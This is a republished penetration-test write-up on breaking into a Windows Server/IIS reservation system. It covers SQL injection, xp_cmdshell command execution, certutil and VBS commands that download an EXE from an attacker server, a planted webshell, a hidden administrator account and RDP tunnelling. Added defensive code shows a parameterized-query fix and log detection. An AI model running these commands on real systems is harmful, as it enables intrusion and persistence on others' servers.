How to perform simple Win Server infiltration

2025-01-16 Update, from SLTechnology News&Howtos

Shulou (Shulou.com) 06/01 Report

How do you carry out a simple Win Server infiltration? This article walks through the analysis and the solution in detail, in the hope of helping readers facing the same problem find a simpler, workable method.

0x00

A penetration of one organisation's host system; sensitive information has been redacted.

Target environment: Windows Server 2008 R2 + IIS 7.5 + ASP.NET 2.0.50727

0x01

The system is a reservation system. A port scan shows many open ports; of note, ports 135, 445 and 3389 are filtered by the firewall, while port 1433 is open. Brute-forcing the sa password on 1433 is usually very hard, so that was set aside for the time being.

0x02

When testing the function points by hand, fuzzing found that almost none of the SELECT parameters could be injected, which suggests the back end uses a uniform query method (parameterization or an ORM) for reads. So there is no point continuing with SELECT parameters; focus instead on UPDATE or INSERT, where there may be an opening.

Sure enough, testing found a time-based blind injection in the function that modifies the user's mailbox.

The mailbox format is only validated on the front end, which is trivially bypassed.

After getting a shell and reading the source, it was confirmed that the UPDATE statement does not use a parameterized query.
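The defect just described, shown beside its fix as an added example (not code from the reservation system; SQLite stands in for SQL Server and the user table is constructed): the concatenated UPDATE lets any quote in the mailbox value reach the SQL parser, a bound parameter stores the same value verbatim and touches only the intended row, and a server-side format check (the front-end check alone was bypassable) rejects it outright.

```python
import re
import sqlite3

def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the reservation system's user table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, email TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "admin", "admin@example.com"), (2, "guest", "guest@example.com")])
    conn.commit()
    return conn

def update_mailbox_unsafe(conn, user_id: int, email: str) -> int:
    # String concatenation, as the write-up found in the UPDATE path: the value is
    # pasted into the statement, so a quote in it ends the literal and the rest is SQL.
    cur = conn.execute(f"UPDATE users SET email = '{email}' WHERE id = {user_id}")
    conn.commit()
    return cur.rowcount

EMAIL_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")

def update_mailbox_safe(conn, user_id: int, email: str, validate: bool = True) -> int:
    # Bound parameter: the driver sends the value separately from the statement, so it
    # can never be parsed as SQL. The server-side format check is defence in depth.
    if validate and not EMAIL_RE.match(email):
        raise ValueError("invalid mailbox format")
    cur = conn.execute("UPDATE users SET email = ? WHERE id = ?", (email, user_id))
    conn.commit()
    return cur.rowcount

def demo(email: str) -> dict:
    """Feed the same input to each variant on a fresh table; report outcome, rows hit, table state."""
    variants = {
        "unsafe": update_mailbox_unsafe,
        "param_only": lambda c, u, e: update_mailbox_safe(c, u, e, validate=False),
        "safe": update_mailbox_safe,
    }
    out = {}
    for label, fn in variants.items():
        conn = make_db()
        try:
            rows = fn(conn, 2, email)
            state = conn.execute("SELECT email FROM users ORDER BY id").fetchall()
            out[label] = ("ok", rows, state)
        except (sqlite3.Error, ValueError) as exc:
            out[label] = ("rejected", type(exc).__name__, None)
    return out

if __name__ == "__main__":
    for label, res in demo("x@example.com' WHERE 1=1 --").items():
        print(label, res)
```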

0x03

One pass with SQLMap; first test whether the account has DBA privileges.

Very lucky.

Try to execute commands directly through the xp_cmdshell component. Because the application connects as the sa user, the corresponding OS privileges are usually very high; here it is SYSTEM outright.

0x04

I wanted to keep digging for useful information, but ran into a problem: getting command output back through time-based blind injection is very slow, and a single dir takes almost 5-10 minutes to echo. So a WebShell or Meterpreter is needed.

The WebShell is shelved for now because the absolute path is unknown and output is hard to obtain.

Attempts to download a remote-control tool from the VPS with certutil and with VBS all failed.

// certutil
certutil -urlcache -split "http://1.1.1.1/1.exe"

// vbs
echo set a=createobject(^"adod^"+^"b.stream^"):set w=createobject(^"micro^"+^"soft.xmlhttp^"):w.open ^"get^",wsh.arguments(0),0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile wsh.arguments(1),2 >>d.vbs

cscript d.vbs http://1.1.1.1/1.exe C:\Windows\temp\1.exe

Next, determine whether the download itself failed or succeeded but the file was killed: a plain-text file downloads successfully.

Directly executing a ps1 generated by CS also failed; the guess is that the server's AV performs a second check on dynamic behaviour.

0x05

Calm down and think. Next, either try to write a WebShell, or find the SQL Server configuration file, connect directly to the open port 1433 from the public network, and run xp_cmdshell from there (that echo is of course far faster than time-based blind injection). Either way the web directory has to be found first, for the configuration file. Walking the directory tree through the existing time-based blind injection could take a day, so the absolute path has to be learned with as few echoes as possible.

First determine all drive letters of the target system through wmic:

wmic logicaldisk where DriveType=3 get DeviceID

Then search the web path for some characteristic file names with a wildcard:

for /r C:\ %i in (dir1\dir2\special_name.asp*) do @echo %i

Because the echo is slow, this is not repeated in os-shell; it is demonstrated through AntSword.

Seven paths were echoed. Try echo 1 > xxxx1.txt in each one in turn, and finally confirm that the web directory is a directory under E:\Program Files (x86).

Happily write the WebShell.

Connect.

0x06

The WebShell only has IIS privileges, so flip through the configuration file.

This echo is much more convenient.

0x07

First, to log in to the admin backend, the administrator's password was queried and found to be an 80-byte encrypted string.

The encryption function was not found in the source (part of the source exists only as binaries, without .cs files). If any expert recognises the encryption, you are welcome to get in touch.

In the end I thought: just insert the encrypted password of my own ordinary user into the admin table.

Logged in to the backend successfully.

0x08

Remembering that the target has 3389 open, try to connect.

Add a user through the SYSTEM privileges of xp_cmdshell:

net user iv4n$ xxxxxxx /add

net localgroup administrators iv4n$ /add
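A detection-side counterpart to the xp_cmdshell execution in 0x03 and the account creation just shown, added here as an example and not part of the original write-up. It runs over a few constructed Windows Security-log events (field names approximate the EventData names of events 4688, 4720 and 4732; the helpdesk/jsmith record is an ordinary control entry) and flags a shell spawned by sqlservr.exe, an account created by SYSTEM or with a `$` suffix (which plain `net user` output omits), and a freshly created account added to Administrators.

```python
from datetime import datetime, timedelta
from typing import Dict, List

# Constructed sample events; timestamps are ISO-8601, paths are Windows paths.
EVENTS = [
    {"time": "2025-01-16T10:00:00", "id": 4688, "SubjectUserName": "SYSTEM",
     "ParentProcessName": r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe",
     "NewProcessName": r"C:\Windows\System32\cmd.exe"},
    {"time": "2025-01-16T10:00:01", "id": 4688, "SubjectUserName": "SYSTEM",
     "ParentProcessName": r"C:\Windows\System32\cmd.exe",
     "NewProcessName": r"C:\Windows\System32\net.exe"},
    {"time": "2025-01-16T10:00:02", "id": 4720, "SubjectUserName": "SYSTEM", "TargetUserName": "iv4n$"},
    {"time": "2025-01-16T10:00:03", "id": 4732, "SubjectUserName": "SYSTEM",
     "TargetUserName": "Administrators", "MemberName": "iv4n$"},
    {"time": "2025-01-16T11:30:00", "id": 4720, "SubjectUserName": "helpdesk", "TargetUserName": "jsmith"},
]

SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe"}

def _base(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()

def detect(events: List[Dict]) -> List[str]:
    """Return one alert string per suspicious pattern, in event order."""
    alerts = []
    created = {}  # account name -> creation time, to correlate with group changes
    for ev in events:
        ts = datetime.fromisoformat(ev["time"])
        if ev["id"] == 4688 and _base(ev["ParentProcessName"]) == "sqlservr.exe" \
                and _base(ev["NewProcessName"]) in SHELLS:
            alerts.append(f"{ev['time']} SQL Server spawned {_base(ev['NewProcessName'])} "
                          "(xp_cmdshell-style execution)")
        elif ev["id"] == 4720:
            name = ev["TargetUserName"]
            created[name] = ts
            reasons = []
            if name.endswith("$"):
                reasons.append("name ends with $ (hidden from plain 'net user' output)")
            if ev["SubjectUserName"].upper() == "SYSTEM":
                reasons.append("created by SYSTEM rather than an admin session")
            if reasons:
                alerts.append(f"{ev['time']} account {name} created: " + "; ".join(reasons))
        elif ev["id"] == 4732 and ev["TargetUserName"].lower() == "administrators":
            member = ev["MemberName"]
            msg = f"{ev['time']} {member} added to Administrators"
            if member in created and ts - created[member] <= timedelta(minutes=10):
                msg += " within 10 min of creation (local admin backdoor pattern)"
            alerts.append(msg)
    return alerts

if __name__ == "__main__":
    print("\n".join(detect(EVENTS)))
```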

But the firewall restricts access to 3389 from the public network. Try forwarding it through a socks proxy.

(Since an EXE would need to evade AV, the intention was to forward with the system's own netsh component, but the forward raised an exception on connection, so reGeorge was used instead to reach the target's internal ports.)

Everything seems fine; test it.

Edit the proxychains configuration to use local port 4444 as a socks4 proxy, and connect with rdesktop through proxychains.

0x09

The target system does not have a domain environment, so testing ends here.

That concludes the walkthrough of the simple Win Server infiltration question. I hope the content above is of some help to you. If you still have many doubts, follow the industry information channel to learn more.
